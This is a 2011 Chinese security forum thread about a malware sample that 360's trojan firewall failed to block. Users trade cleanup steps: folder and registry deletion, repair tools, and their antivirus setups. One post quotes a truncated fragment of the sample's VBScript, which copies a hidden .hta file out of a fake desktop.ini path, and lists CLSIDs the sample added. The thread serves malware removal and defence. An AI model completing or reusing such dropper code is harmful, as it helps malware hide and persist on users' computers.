送360一样本，我木马防火墙点阻止，但照样没成功拦截

显示全部楼层 · 发表于 2011-1-7 21:35:50

回复 30楼左手的帖子

就是快速扫描和系统修复功能，扫一下，常规系统和IE错误以及异常启动项因该都能扫出来

显示全部楼层 · 发表于 2011-1-7 21:44:15

回复 31楼 leisong 的帖子

谢谢。。这个毒的其它问题用360修复了。。

显示全部楼层 · 发表于 2011-1-8 18:33:21

回复 32楼左手的帖子

当时windows清理助手清理它很easy。好像有个叫vvolume的文件夹，删掉，顺便用关键词法我拿S大的registyry workshop删了某注册表。

桌面IE，我拿系统自带的清理掉了。在受限账户下，系统自带的清理桌面图标的时候，会有点注册表上的提示，我百度谷歌下，估计是被样本添加的，备份后，删了。

显示全部楼层 · 发表于 2011-1-8 19:48:17

回复 33楼 hujiwa 的帖子

呵。我也已中标了。
那个文件夹没有生成。。

显示全部楼层 · 发表于 2011-1-8 19:58:58

本帖最后由 hujiwa 于 2011-1-9 07:48 编辑

回复 34楼左手的帖子

Set vbs=CreateObject("WScript.shell")
desktop=vbs.SpecialFolders(4)&"\"
vbs.run("xcopy D:\desktop.ini\tmp.hta D:\VVolu后面残缺。。。

{78AE2D63-AB8A-9AD7-8888-86A33833C94B}
{871C5380-42A0-1069-A2EA-08002B30309D}
{3F92DA25-A429-7777-A754-4482C9B99C28}
下面好像有些病毒送的东西

显示全部楼层 · 发表于 2011-1-9 19:12:43

回复 35楼 hujiwa 的帖子

现在不玩MD了吗？
谢谢你的这个样本。发现了一个小问题。不过W大正在修正。

显示全部楼层 · 发表于 2011-1-9 19:27:54

本帖最后由 hujiwa 于 2011-1-9 19:30 编辑

回复 36楼左手的帖子

MD是给我老爸用的，我家不止一台电脑。我可以不用那么高端的货色

显示全部楼层 · 发表于 2011-1-9 19:44:03

回复 37楼 hujiwa 的帖子

主打360？

显示全部楼层 · 发表于 2011-1-10 18:59:33

回复 38楼左手的帖子

老爸那是MD+红伞。偶这是avast/红伞+某卫士，我的装备就看心情了。

显示全部楼层 · 发表于 2011-1-12 08:54:39

受教了!

[分享] 送360一样本，我木马防火墙点阻止，但照样没成功拦截